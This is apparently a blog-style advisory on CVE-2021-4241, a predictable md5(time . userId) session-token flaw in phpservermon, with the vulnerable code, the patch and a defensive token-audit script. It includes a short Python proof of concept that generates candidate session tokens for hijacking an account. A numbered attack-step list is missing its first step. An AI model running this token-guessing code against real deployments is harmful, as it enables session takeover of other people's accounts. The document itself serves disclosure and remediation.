In late 2021, a vulnerability identified as CVE-2021-4241 was discovered in the popular server monitoring tool, phpservermon. This issue, classified as "problematic," impacts the security of user sessions and could allow attackers to take over accounts by predicting session tokens. Let's take a deeper look at what happened, see how the exploit works, and learn how to fix it.

What is phpservermon?

phpservermon is an open-source PHP script that helps you monitor server uptime and performance. It's popular for small and medium-sized businesses because it's simple to use and manage.

About the Vulnerability

Where is the Problem?  
The issue affects the setUserLoggedIn function found in the file:  
src/psm/Service/User.php

What's the Cause?  
This function uses a weak, predictable algorithm to generate the random token that identifies user sessions. If an attacker can guess or calculate future tokens, they can hijack sessions and potentially gain admin access on the system.

Vulnerability Detail:  
*Use of predictable algorithm in random number generator.*

CVE: CVE-2021-4241  
VDB: VDB-213744  
Patch: bb10a5f3c68527c58073258cb12446782d223bc3

Here's a simplified (but representative) snippet of the problematic code (before the patch):

```php
// File: src/psm/Service/User.php
// Unpatched version
public function setUserLoggedIn($userId) {
    // Generates a "random" token for session
    $token = md5(time() . $userId);
    $_SESSION['logged_in'] = true;
    $_SESSION['user_token'] = $token;
    // ... other session stuff
}
```

The problem?  
- The session token uses md5(time() . $userId), which is easy for attackers to guess, especially if they know the login time and userId.

How serious is this?
An attacker with basic info (e.g., user ID, approximate login time) could generate the same session token and hijack the user's session.

2. They also guess the user's ID (often a simple integer).

3. They generate possible session tokens by running md5 over combinations of $userId and a recent few timestamps.

Here’s how a simple attack could look in Python:

```python
import hashlib
import time

user_id = 1
login_time = int(time.time())  # Let's say you estimate the time

for delta in range(-5, 6):  # Try a range of seconds
    token_str = str(login_time + delta) + str(user_id)
    session_token = hashlib.md5(token_str.encode()).hexdigest()
    print("Try token:", session_token)
    # Send this token with a session cookie to the app!
```

By repeating this process, the attacker can likely hijack the session if guessing is successful.

The Fix

To resolve the vulnerability, the use of a predictable value for tokens must be replaced with a cryptographically secure random value.

Patched code

```php
// File: src/psm/Service/User.php
// After the patch (commit bb10a5f3c68527c58073258cb12446782d223bc3)
public function setUserLoggedIn($userId) {
    // Use a cryptographically secure random generator
    $token = bin2hex(random_bytes(32));
    $_SESSION['logged_in'] = true;
    $_SESSION['user_token'] = $token;
    // ... other session stuff
}
```

Patch your installation!

Get the latest fixed version of phpservermon or manually apply the patch.

Monitor for similar issues:

Avoid using md5, sha1, or time/user-dependent values for session or security tokens.
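
To check your own applications for this pattern, the following audit script (an added example, not code from phpservermon or its patch) tests whether tokens already issued by an application can be rebuilt from the issue time and user ID alone. It goes beyond the md5(time() . $userId) case on this page by also trying sha1 and two other input layouts; the function names, record format and sample values are assumptions constructed for illustration.

```python
import hashlib
import secrets

# Hash functions and input layouts to test; the page's bug is md5(time . userId).
HASHES = ("md5", "sha1")
LAYOUTS = (
    lambda ts, uid: f"{ts}{uid}",   # time() . $userId  (the unpatched pattern)
    lambda ts, uid: f"{uid}{ts}",   # $userId . time()
    lambda ts, uid: f"{ts}",        # time() alone
)

def find_time_derivation(token, user_id, issued_at, window=5):
    """Return (hash_name, layout_index, timestamp) if the token can be rebuilt
    from the issue time and user ID alone, else None."""
    token = token.lower()
    for ts in range(issued_at - window, issued_at + window + 1):
        for idx, layout in enumerate(LAYOUTS):
            data = layout(ts, user_id).encode()
            for name in HASHES:
                if hashlib.new(name, data).hexdigest() == token:
                    return (name, idx, ts)
    return None

def audit(records, window=5):
    """records: iterable of (user_id, issued_at, token) taken from your own
    session store. Returns the records whose token is reproducible."""
    findings = []
    for user_id, issued_at, token in records:
        hit = find_time_derivation(token, user_id, issued_at, window)
        if hit:
            findings.append((user_id, issued_at, token, hit))
    return findings

# Constructed sample data: one token built the unpatched way, one the patched way.
SAMPLE = [
    (1, 1668554100, hashlib.md5(b"16685540981").hexdigest()),  # md5(time . userId)
    (2, 1668554200, secrets.token_hex(32)),  # like bin2hex(random_bytes(32))
]

if __name__ == "__main__":
    for user_id, issued_at, token, (name, idx, ts) in audit(SAMPLE):
        print(f"user {user_id}: token reproducible as {name}, layout {idx}, ts {ts}")
```

Any finding means the token carries no secret entropy and the generator should be replaced with a CSPRNG, as in the patched code above.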

Conclusion

CVE-2021-4241 is a great example of why cryptographic randomness is critical for all authentication routines. If you’re running phpservermon, upgrade NOW, and double-check your other apps for similar vulnerabilities. Even small details, like how you generate a session token, can make a massive difference in keeping your software—and your data—safe.

Timeline

Published on: 11/15/2022 23:15:00 UTC
Last modified on: 07/18/2023 13:52:00 UTC